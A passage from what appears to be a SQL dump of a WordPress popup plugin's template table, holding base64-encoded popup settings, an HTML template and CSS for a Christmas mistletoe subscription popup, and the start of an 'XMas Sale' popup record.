pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjExNjp7czo1OiJ3aWR0aCI7czozOiI4MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6MTU6ImJnX292ZXJsYXlfdHlwZSI7czo1OiJjb2xvciI7czoxNjoiYmdfb3ZlcmxheV9jb2xvciI7czo0OiIjMDAwIjtzOjE0OiJiZ19vdmVybGF5X2ltZyI7czowOiIiO3M6MTg6ImJnX292ZXJsYXlfaW1nX3BvcyI7czo3OiJzdHJldGNoIjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiIzAwMTkzMyI7czo5OiJiZ190eXBlXzEiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18xIjtzOjQyOiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9NaXN0bGV0b2VfMS5wbmciO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiIzgxZDc0MiI7czo5OiJiZ190eXBlXzIiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18yIjtzOjQyOiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9NaXN0bGV0b2VfMi5wbmciO3M6MTA6ImJnX2NvbG9yXzIiO3M6NzoiI2QzZTU0NyI7czo5OiJiZ190eXBlXzMiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzMiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8zIjtzOjc6IiNmZmZmZmYiO3M6OToiYmdfdHlwZV80IjtzOjQ6Im5vbmUiO3M6ODoiYmdfaW1nXzQiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl80IjtzOjc6IiNmZmZmZmYiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjZmZmZmZmIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiNmZmZmZmYiO3M6MTA6ImZvbnRfdHh0XzEiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzEiO3M6NzoiI2ZmZmZmZiI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiI2ZmZmZmZiI7czoxNzoicmVpZHJlY3Rfb25fY2xvc2UiO3M6MDoiIjtzOjk6ImNsb3NlX2J0biI7czo0OiJub25lIjtzOjc6ImJ1bGxldHMiO3M6MTE6Imxpc3RzX2dyZWVuIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6MTE6Ildpc2hpbmcgWW91IjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjk6ImVuYl90eHRfMSI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czoxMTg6IldlIHJlc3BlY3QgeW91ciBwcml2YWN5LiBZb3VyIGluZm9ybWF0aW9uIHdpbGwgbm90IGJlIHNoYXJlZCB3aXRoIGFueSB0aGlyZCBwYXJ0eSBhbmQgeW91IGNhbiB1bnN1YnNjcmliZSBhdCBhbnkgdGltZSAiO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo0OiJib3h5IjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MjU6InN1Yl9tYWlsY2hpbXBfZ3JvdXBzX2Z1bGwiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTY6InN1Yl9ncl9jeWNsZV9kYXkiO3M6MToiMCI7czoxMzoic3ViX2ljX2FwcF9pZCI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfdXNlciI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfcGFzcyI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMzoic3ViX3NmX2FwcF9pZCI7czowOiIiO3M6MTQ6InN1Yl9ja19hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX21lbV9hY2NfaWQiO3M6MDoiIjtzOjE1OiJzdWJfbWVtX3B1ZF9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfbWVtX3ByaXZfa2V5IjtzOjA6IiI7czoxNDoic3ViX3NiX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfdjZfYXBpX2tleSI7czowOiIiO3M6MTI6InN1Yl92dGlnX3VybCI7czowOiIiO3M6MTM6InN1Yl92dGlnX25hbWUiO3M6MDoiIjtzOjEyOiJzdWJfdnRpZ19rZXkiO3M6MDoiIjtzOjE2OiJzdWJfeW1scF9hcGlfa2V5IjtzOjA6IiI7czoxMzoic3ViX3ltbHBfbmFtZSI7czowOiIiO3M6MTE6InN1Yl80ZF9uYW1lIjtzOjA6IiI7czoxMToic3ViXzRkX3Bhc3MiO3M6MDoiIjtzOjEwOiJzdWJfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo2OntzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJzdWJfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToic3ViX3R4dF9zdWNjZXNzIjtzOjI0OiJUaGFuayB5b3UgZm9yIHN1YnNjcmliZSEiO3M6MjE6InN1Yl90eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoyMDoic3ViX3R4dF9leGlzdHNfZW1haWwiO3M6MjQ6IkVtcHR5IG9yIGluY29ycmVjdCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6ODoiU0VORCBOT1ciO3M6MTM6InN1Yl9uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJzdWJfbmV3X3N1YmplY3QiO3M6Mjg6Ik5ldyBzdWJzY3JpYmVyIG9uIFtzaXRlbmFtZV0iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgaXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo4OiJsb2dpbl9ieSI7czo4OiJ1c2VybmFtZSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjEwOiLQm9C+0LPQuNC9IjtzOjIzOiJyZWdfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxMzoicmVnX2J0bl9sYWJlbCI7czo4OiJSZWdpc3RlciI7czoxMDoicmVnX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6ItCY0LzRjyI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJyZWdfdHh0X2NvbmZpcm1fc2VudCI7czoxOTU6ItCh0YHRi9C70LrQsCDQtNC70Y8g0L/QvtC00YLQstC10YDQttC00LXQvdC40Y8g0LHRi9C7INC+0YLQv9GA0LDQstC70LXQvdCwINC90LAg0LLQsNGIINCw0LTRgNC10YEg0Y3Qu9C10LrRgtGA0L7QvdC90L7QuSDQv9C+0YfRgtGLLiDQn9GA0L7QstC10YDRjNGC0LUg0LLQsNGI0YMg0Y3Qu9C10LrRgtGA0L7QvdC90YPRjiDQv9C+0YfRgtGDISI7czoxNToicmVnX3R4dF9zdWNjZXNzIjtzOjQzOiLQodC/0LDRgdC40LHQviDQt9CwINGA0LXQs9C40YHRgtGA0LDRhtC40Y4hIjtzOjIxOiJyZWdfdHh0X2ludmFsaWRfZW1haWwiO3M6NTg6ItCf0YPRgdGC0L7QuSDQuNC70Lgg0L3QtdC00LXQudGB0YLQstC40YLQtdC70YzQvdGL0LkgZW1haWwiO3M6MTY6InJlZ19yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjYxOiLQn9C+0LTRgtCy0LXRgNC00LjRgtC1INGA0LXQs9C40YHRgtGA0LDRhtC40Y4g0L3QsCBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czozMzQ6ItCS0Ysg0LfQsNGA0LXQs9C40YHRgtGA0LjRgNC+0LLQsNC90Ysg0L3QsCDRgdCw0LnRgtC1IDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4g0KHQu9C10LTRg9C50YLQtSAgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiDQtNC70Y8g0LfQsNCy0LXRgNGI0LXQvdC40Y8g0YDQtdCz0LjRgdGC0YDQsNGG0LjQuC4g0JXRgdC70Lgg0LLRiyDQvdC1INC30LDRgNC10LPQuNGB0YLRgNC40YDQvtCy0LDQu9C40YHRjCDQt9C00LXRgdGMIC0g0L/RgNC+0YHRgtC+INC40LPQvdC+0YDQuNGA0YPQudGC0LUg0Y3RgtC+INGB0L7QvtCx0YnQtdC90LjQtS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6NDU6IltzaXRlbmFtZV0gINCS0LDRiCDQu9C+0LPQuNC9INC4INC/0LDRgNC+0LvRjCI7czoyODoicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NzE6ItCb0L7Qs9C40L06IFt1c2VyX2xvZ2luXTxiciAvPtCf0LDRgNC+0LvRjDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjEzOiJyZWdfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToicmVnX25ld19tZXNzYWdlIjtzOjE3Nzoi0KMg0LLQsNGBINC90L7QstGL0Lkg0L/QvtC70YzQt9C+0LLQsNGC0LXQu9GMINC90LAg0YHQsNC50YLQtSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sINCy0L7RgiDQuNC90YTQvtGA0LzQsNGG0LjRjyDQv9C+0LvRjNC30L7QstCw0YLQtdC70Y86IDxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjEyOiJjb250YWN0X2Zvcm0iO3M6MjoiMjAiO3M6MTI6InN0YXRfZ2FfY29kZSI7czowOiIiO3M6NToidHh0XzAiO3M6NTk6IjxwPkpveW91cyBIb2xpZGF5PC9wPjxwPiZhbXA7PC9wPjxwPlByb3NwZXJvdXMgTmV3IFllYXI8L3A+IjtzOjU6InR4dF8xIjtzOjI2OiI8cD5Gcm9tIFN1cHN5c3RpYyBUZWFtPC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiNSI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIyIjt9fQ==','<link href=\"https://fonts.googleapis.com/css?family=Great+Vibes|Lato\" rel=\"stylesheet\">\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if bg_type_1 == \"img\"]\r\n			<div class=\"ppsWrapImgCrn ppsWrapImgLftCrn\">\r\n				<img class=\"ppsImgLftCrn\" src=\"[bg_img_1]\" alt=\"left image\"/>\r\n			</div>\r\n			[endif]\r\n			[if bg_type_2 == \"img\"]\r\n			<div class=\"ppsWrapImgCrn ppsWrapImgRghtCrn\">\r\n				<img class=\"ppsImgRghtCrn\" src=\"[bg_img_2]\" alt=\"rigth image\"/>\r\n			</div>\r\n			[endif]\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_txt_1]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_1 ppsPopupTxt_1\">\r\n				[txt_1]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					<div class=\"ppsFormWrap\">\r\n					[sub_fields_html]\r\n					</div><input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsBottomtCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: \"Great Vibes\";\r\n	font-weight: normal;\r\n	[if bg_type_0 == \"color\"]\r\n	background-color: [bg_color_0];\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n	text-align: center;\r\n	color: #fff;\r\n  	width: 100%;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n	width: 90%;\r\n	text-align: center;\r\n	display: inline-block;\r\n    margin: 40px 0 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	display: inline-block;\r\n    position: relative;\r\n    text-align: left;\r\n    width: 60%;\r\n    z-index: 100;\r\n}\r\n\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: \"Lato\";\r\n	font-size: 15px;\r\n	font-weight: normal;\r\n	border: 3px solid #fff;\r\n  	padding: 0 0 0 20px;\r\n	margin: 10px 0 0;\r\n	color: #fff;\r\n	width: 100%;\r\n	display: block;\r\n	vertical-align: top;\r\n	outline: none;\r\n	-webkit-border-radius: 0px;\r\n	-moz-border-radius: 0px;\r\n	border-radius: 0px;\r\n	\r\n  	[if bg_type_4 == \"color\"]\r\n  	background-color: [bg_color_4];\r\n    [elseif bg_type_4 == \"img\"]\r\n  	background-image: url(\"[bg_img_4]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n	[else]\r\n	background-color: transparent;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select  {\r\n	margin-top: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n	margin-top: 0px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	font-family: \"Lato\";\r\n	font-size: 15px;\r\n	font-weight: normal;\r\n	display: block;\r\n	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: inline-block;\r\n	padding-right: 2px;\r\n	vertical-align: middle;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=radio],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=checkbox] {\r\n	vertical-align: middle;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	height: 42px;\r\n}\r\n#ppsPopupShell_[ID] .ppsFormWrap {\r\n	text-align: left;\r\n	width: 65%;\r\n	vertical-align: bottom;\r\n	display: inline-block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	font-family: \"Lato\";\r\n	font-size: 20px;\r\n	font-weight: normal;\r\n	width: 30%;\r\n  	text-align: center;\r\n 	cursor: pointer;\r\n  	text-decoration: none;\r\n  	color: #001933;\r\n  	display: inline-block;\r\n	vertical-align: bottom;\r\n	padding: 0px;\r\n	margin: 0;\r\n	border: none;\r\n	outline: none;\r\n	height: 42px;\r\n	-webkit-border-radius: 0px;\r\n	-moz-border-radius: 0px;\r\n	border-radius: 0px;\r\n	\r\n	[if bg_type_3 == \"color\"]\r\n  	background:[bg_color_3] !important;\r\n    [elseif bg_type_3 == \"img\"]\r\n  	background-image: url(\"[bg_img_3]\") !important;\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsBottomtCol {\r\n	display: inline-block;\r\n	margin-bottom: 100px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	display: inline-block;\r\n	font-size: 30px;\r\n	width: 90%;\r\n	position: relative;\r\n	margin: 50px 30px 0;\r\n	z-index: 100;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt {\r\n	width: 90%;\r\n	text-align: center;\r\n	display: inline-block;\r\n	position: relative;\r\n	z-index: 100;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt  p {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	font-size: 50px;\r\n	line-height: 51px;\r\n	margin-top: 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 p {\r\n	line-height: 51px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n	margin-top: 30px;\r\n  	font-size: 25px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg {\r\n	display: block;\r\n	text-align: center;\r\n	width: 100%;\r\n	margin-top: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n  	right: -20px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #fff;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupShell .ppsErrorMsg{\r\n  width: 200px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsWrapImgCrn {\r\n	position: absolute;\r\n}\r\n#ppsPopupShell_[ID] .ppsWrapImgLftCrn {\r\n	top: 20px;\r\n	left: 12px;\r\n}\r\n#ppsPopupShell_[ID] .ppsWrapImgRghtCrn {\r\n	bottom: 20px;\r\n    right: 12px;\r\n}','christmas-mistletoe.png',1,1,1,11,0,0,0,'2015-01-10 17:59:43',44,0),(45,'XMas Sale',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMzoib3ZlcmxheV9jbGljayI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjExMTp7czo1OiJ3aWR0aCI7czozOiI2NzUiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6MTU6ImJnX292ZXJsYXlfdHlwZSI7czo1OiJjb2xvciI7czoxNjoiYmdfb3ZlcmxheV9jb2xvciI7czo0OiIjMDAwIjtzOjE0OiJiZ19vdmVybGF5X2ltZyI7czowOiIiO3M6MTg6ImJnX292ZXJsYXlfaW1nX3BvcyI7czo3OiJzdHJldGNoIjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ